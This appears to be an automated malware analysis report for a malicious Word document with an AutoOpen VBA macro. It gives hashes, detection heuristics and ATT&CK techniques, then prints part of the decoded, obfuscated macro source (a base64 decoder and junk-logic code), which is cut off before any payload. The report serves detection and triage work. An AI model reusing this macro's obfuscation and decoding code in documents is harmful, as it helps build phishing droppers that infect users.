Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82c783d3c8055e68…

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-05-06 21:59:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 624ab4f554c80e841b10f78593dee30c SHA-1: baa6bcab5b5a9185fb8887e4214edec93dffdcd8 SHA-256: 82c783d3c8055e68dcf674946625cfae864e74a973035a61925d33294684c6d4
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a VBA macro. The macro is obfuscated and uses CreateObject to execute code, a common technique for downloading and running additional payloads. The presence of the 'AutoOpen' macro and the 'SE_ENABLE_LURE' heuristic indicate the document is designed to trick the user into enabling macros, which then triggers the malicious execution chain. No specific family could be identified, but the overall pattern suggests a downloader.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10460 bytes
SHA-256: 493da3895ec327b433bd50f8c1101ae9f6098d71596effcf08f3cd879fea9c69
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DRKA6m"

Public Function q3hmuCVn33ZZzc7R(jSeL9tnfO5oxBuI As String, Optional THREE As Boolean = True) As String
Static fHnC74jZF8p7IA(0 To 255) As Byte
Dim MgKwc0nGOp9d() As Byte, XFP58uZYevinozS() As Byte
Dim HQ1JhXHzMVCUAiQq1q As Long, xuZnPWyyOFPCYyYf As Long
If fHnC74jZF8p7IA(0) = 0 Then
For HQ1JhXHzMVCUAiQq1q = 0 To 255
fHnC74jZF8p7IA(HQ1JhXHzMVCUAiQq1q) = 255
Next HQ1JhXHzMVCUAiQq1q
For HQ1JhXHzMVCUAiQq1q = 0 To 25
fHnC74jZF8p7IA(HQ1JhXHzMVCUAiQq1q + 65) = HQ1JhXHzMVCUAiQq1q
Next HQ1JhXHzMVCUAiQq1q
For HQ1JhXHzMVCUAiQq1q = 26 To 51
fHnC74jZF8p7IA(HQ1JhXHzMVCUAiQq1q + 71) = HQ1JhXHzMVCUAiQq1q
Next HQ1JhXHzMVCUAiQq1q
For HQ1JhXHzMVCUAiQq1q = 52 To 61
fHnC74jZF8p7IA(HQ1JhXHzMVCUAiQq1q - 4) = HQ1JhXHzMVCUAiQq1q
Next HQ1JhXHzMVCUAiQq1q
fHnC74jZF8p7IA(43) = 62
fHnC74jZF8p7IA(47) = 63
End If
If jSeL9tnfO5oxBuI = "" Then Exit Function
jSeL9tnfO5oxBuI = Trim(jSeL9tnfO5oxBuI)
If THREE Then
For HQ1JhXHzMVCUAiQq1q = 0 To 255
If Not (Chr(HQ1JhXHzMVCUAiQq1q) Like "[A-Za-z0-9+/=]") Then
jSeL9tnfO5oxBuI = Replace(jSeL9tnfO5oxBuI, Chr(HQ1JhXHzMVCUAiQq1q), "")
End If
Next HQ1JhXHzMVCUAiQq1q
End If
XFP58uZYevinozS() = StrConv(jSeL9tnfO5oxBuI, vbFromUnicode)
ReDim MgKwc0nGOp9d(0 To ((Len(jSeL9tnfO5oxBuI) \ 4) * 3 - 1))
For HQ1JhXHzMVCUAiQq1q = 0 To Len(jSeL9tnfO5oxBuI) \ 4 - 2
xuZnPWyyOFPCYyYf = fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 3))
xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 2)) * &H40&)
xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 1)) * &H1000&)
xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 0)) * &H40000)
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 0) = (xuZnPWyyOFPCYyYf And &HFF0000) \ &H10000
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 1) = (xuZnPWyyOFPCYyYf And &HFF00&) \ &H100&
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 2) = xuZnPWyyOFPCYyYf And &HFF&
Next HQ1JhXHzMVCUAiQq1q
xuZnPWyyOFPCYyYf = 0
If fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 3)) <> 255 Then xuZnPWyyOFPCYyYf = fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 3))
If fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 2)) <> 255 Then xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 2)) * &H40&)
If fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 1)) <> 255 Then xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 1)) * &H1000&)
If fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 0)) <> 255 Then xuZnPWyyOFPCYyYf = xuZnPWyyOFPCYyYf Or (fHnC74jZF8p7IA(XFP58uZYevinozS(HQ1JhXHzMVCUAiQq1q * 4 + 0)) * &H40000)
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 0) = (xuZnPWyyOFPCYyYf And &HFF0000) \ &H10000
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 1) = (xuZnPWyyOFPCYyYf And &HFF00&) \ &H100&
MgKwc0nGOp9d(HQ1JhXHzMVCUAiQq1q * 3 + 2) = xuZnPWyyOFPCYyYf And &HFF&
If XFP58uZYevinozS(UBound(XFP58uZYevinozS) - 1) = 61 Then
q3hmuCVn33ZZzc7R = Left(StrConv(MgKwc0nGOp9d, vbUnicode), UBound(MgKwc0nGOp9d) - 1)
ElseIf XFP58uZYevinozS(UBound(XFP58uZYevinozS)) = 61 Then
q3hmuCVn33ZZzc7R = Left(StrConv(MgKwc0nGOp9d, vbUnicode), UBound(MgKwc0nGOp9d) - 0)
Else
q3hmuCVn33ZZzc7R = StrConv(MgKwc0nGOp9d, vbUnicode)
End If
End Function

Sub RemovePicture()
Dim Lxa6x0tgM1mZAri As InlineShape
If Application.UserName = "ApRVN6JD6R7" Then
MsgBox ("RtHmr1nEK2u")
Else
Dim oQLUR3mYOAUu0p As Integer
End If
Dim KpfUfCzROwLadk, jI5BziI88ml As String
KpfUfCzROwLadk = 7
jI5BziI88ml = 5
#If KpfUfCzROwLadk > jI5BziI88ml Then
Dim zN8EDmvKIuK As Object
#Else
Dim zN8EDmvKIuK As Integer
zN8EDmvKIuK = 7 + 5
Dim Bc7JRVT3xCb As Integer
For u7nfuu9HNq2 = Bc7JRVT3xCb To KpfUfCz
... (truncated)